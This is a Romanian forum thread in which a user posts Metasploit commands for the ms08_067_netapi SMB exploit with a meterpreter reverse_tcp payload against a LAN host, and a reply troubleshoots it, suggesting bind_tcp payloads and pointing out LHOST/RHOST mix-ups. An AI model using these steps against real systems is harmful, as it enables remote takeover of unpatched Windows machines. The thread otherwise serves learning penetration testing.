Jump to content
rypp34

backtrack5 r1

Recommended Posts

Posted (edited)

am incercat sa fac un exploit de pe laptop pe pc..... si am folosit framework3 cam asa:

cd /pentest/exploits/framework3

./msfconsole

use windows/smb/ms08_067_netapi

set lhost 192.168.0.105

set lport 445

set rhost 192.168.0.103

set payload windows/meterpreter/reverse_tcp

sessions -i

exploit

problema e ca :

dupa ce scriu sessions -i spune ca nu am nici o sesiune activa

si dupa ce dau exploit spune ca nu se poate lega de 192.168.0.105 (lhost) dupa care ramane asa intr-un stadiu de asteptare....

stie careva vreo solutie sau vreun alt handler? (personal am incercat cu asta : use windows/multi/handler si nu a mers)

// Mersi pentru lamurire co4ie :) , a mers cu alt payload si acum incerc si altele!

Edited by rypp34
Posted

In pimul rand sesiunile se deschid dupa ce exploitul a fost executat .. in al doilea rand ai putea incerca sa folosesti ca payload windows/meterpreter/bind_tcp sau windows/shell/bind_tcp pentru ca la reverse_tcp trebui sa faca upload la stager si sa il execute ! Daca nu ai drepturi de scriere/executare nu o sa iti mearga payload-ul ! Din ce ai postat se vede ca 192.168.0.105 este ip-ul tau, la reverse_tcp ,normal ar trebui sa inceapa sa astepte conexiunea chiar daca exploitul nu functioneaza deci verifica sa nu fi incurcat LHOST(localhost/ip`ul tau) cu RHOST(remotehost/ip`ul victimei)!

BTW: asta e thread-ul de exploituri nu de ajutor ... ai gresit sectiunea !!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...